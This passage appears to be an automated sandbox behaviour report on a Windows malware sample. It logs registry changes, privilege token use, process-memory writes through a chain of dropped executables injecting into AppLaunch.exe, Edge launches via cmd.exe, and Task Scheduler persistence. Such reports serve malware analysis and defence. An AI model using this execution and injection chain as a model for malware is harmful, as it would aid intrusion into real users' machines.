Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-3141 = "South Sudan Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2751 = "Tomsk Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-571 = "China Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-622 = "Korea Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-502 = "Nepal Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-741 = "New Zealand Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2341 = "Haiti Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-335 = "Jordan Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-931 = "Coordinated Universal Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1Aj29Iy7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1Aj29Iy7.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1Aj29Iy7.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\AF69.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\source1.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\AFB.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\E19.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of UnmapMainImage

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3444 wrote to memory of 4636 N/A C:\Users\Admin\AppData\Local\Temp\d5716c2d2f547301ff0b322f76d2a7d012e3e3c0146ef040492ca327cdfef8d8.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\GG2Ha09.exe
PID 3444 wrote to memory of 4636 N/A C:\Users\Admin\AppData\Local\Temp\d5716c2d2f547301ff0b322f76d2a7d012e3e3c0146ef040492ca327cdfef8d8.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\GG2Ha09.exe
PID 3444 wrote to memory of 4636 N/A C:\Users\Admin\AppData\Local\Temp\d5716c2d2f547301ff0b322f76d2a7d012e3e3c0146ef040492ca327cdfef8d8.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\GG2Ha09.exe
PID 4636 wrote to memory of 968 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\GG2Ha09.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\XD1Kq18.exe
PID 4636 wrote to memory of 968 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\GG2Ha09.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\XD1Kq18.exe
PID 4636 wrote to memory of 968 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\GG2Ha09.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\XD1Kq18.exe
PID 968 wrote to memory of 1264 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\XD1Kq18.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\uD5ES53.exe
PID 968 wrote to memory of 1264 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\XD1Kq18.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\uD5ES53.exe
PID 968 wrote to memory of 1264 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\XD1Kq18.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\uD5ES53.exe
PID 1264 wrote to memory of 3732 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\uD5ES53.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1Aj29Iy7.exe
PID 1264 wrote to memory of 3732 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\uD5ES53.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1Aj29Iy7.exe
PID 1264 wrote to memory of 3732 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\uD5ES53.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1Aj29Iy7.exe
PID 1264 wrote to memory of 680 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\uD5ES53.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2rf9479.exe
PID 1264 wrote to memory of 680 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\uD5ES53.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2rf9479.exe
PID 1264 wrote to memory of 680 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\uD5ES53.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2rf9479.exe
PID 680 wrote to memory of 1200 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2rf9479.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 680 wrote to memory of 1200 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2rf9479.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 680 wrote to memory of 1200 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2rf9479.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 680 wrote to memory of 4488 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2rf9479.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 680 wrote to memory of 4488 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2rf9479.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 680 wrote to memory of 4488 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2rf9479.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 680 wrote to memory of 4488 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2rf9479.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 680 wrote to memory of 4488 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2rf9479.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 680 wrote to memory of 4488 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2rf9479.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 680 wrote to memory of 4488 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2rf9479.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 680 wrote to memory of 4488 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2rf9479.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 680 wrote to memory of 4488 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2rf9479.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 680 wrote to memory of 4488 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2rf9479.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 968 wrote to memory of 4172 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\XD1Kq18.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\3nV70HK.exe
PID 968 wrote to memory of 4172 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\XD1Kq18.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\3nV70HK.exe
PID 968 wrote to memory of 4172 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\XD1Kq18.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\3nV70HK.exe
PID 4172 wrote to memory of 1656 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\3nV70HK.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4172 wrote to memory of 1656 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\3nV70HK.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4172 wrote to memory of 1656 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\3nV70HK.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4172 wrote to memory of 1656 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\3nV70HK.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4172 wrote to memory of 1656 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\3nV70HK.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4172 wrote to memory of 1656 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\3nV70HK.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4636 wrote to memory of 5076 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\GG2Ha09.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4Hp031bP.exe
PID 4636 wrote to memory of 5076 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\GG2Ha09.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4Hp031bP.exe
PID 4636 wrote to memory of 5076 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\GG2Ha09.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4Hp031bP.exe
PID 5076 wrote to memory of 1380 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4Hp031bP.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 5076 wrote to memory of 1380 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4Hp031bP.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 5076 wrote to memory of 1380 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4Hp031bP.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 5076 wrote to memory of 1380 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4Hp031bP.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 5076 wrote to memory of 1380 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4Hp031bP.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 5076 wrote to memory of 1380 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4Hp031bP.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 5076 wrote to memory of 1380 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4Hp031bP.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 5076 wrote to memory of 1380 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4Hp031bP.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3444 wrote to memory of 3048 N/A C:\Users\Admin\AppData\Local\Temp\d5716c2d2f547301ff0b322f76d2a7d012e3e3c0146ef040492ca327cdfef8d8.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\5EP7ju9.exe
PID 3444 wrote to memory of 3048 N/A C:\Users\Admin\AppData\Local\Temp\d5716c2d2f547301ff0b322f76d2a7d012e3e3c0146ef040492ca327cdfef8d8.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\5EP7ju9.exe
PID 3444 wrote to memory of 3048 N/A C:\Users\Admin\AppData\Local\Temp\d5716c2d2f547301ff0b322f76d2a7d012e3e3c0146ef040492ca327cdfef8d8.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\5EP7ju9.exe
PID 3048 wrote to memory of 4780 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\5EP7ju9.exe C:\Windows\system32\cmd.exe
PID 3048 wrote to memory of 4780 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\5EP7ju9.exe C:\Windows\system32\cmd.exe
PID 4780 wrote to memory of 2016 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4780 wrote to memory of 2016 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2016 wrote to memory of 2776 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2016 wrote to memory of 2776 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4780 wrote to memory of 4740 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4780 wrote to memory of 4740 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4740 wrote to memory of 3788 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4740 wrote to memory of 3788 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2016 wrote to memory of 3564 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2016 wrote to memory of 3564 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2016 wrote to memory of 3564 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\d5716c2d2f547301ff0b322f76d2a7d012e3e3c0146ef040492ca327cdfef8d8.exe

"C:\Users\Admin\AppData\Local\Temp\d5716c2d2f547301ff0b322f76d2a7d012e3e3c0146ef040492ca327cdfef8d8.exe"

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\GG2Ha09.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\GG2Ha09.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\XD1Kq18.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\XD1Kq18.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\uD5ES53.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\uD5ES53.exe

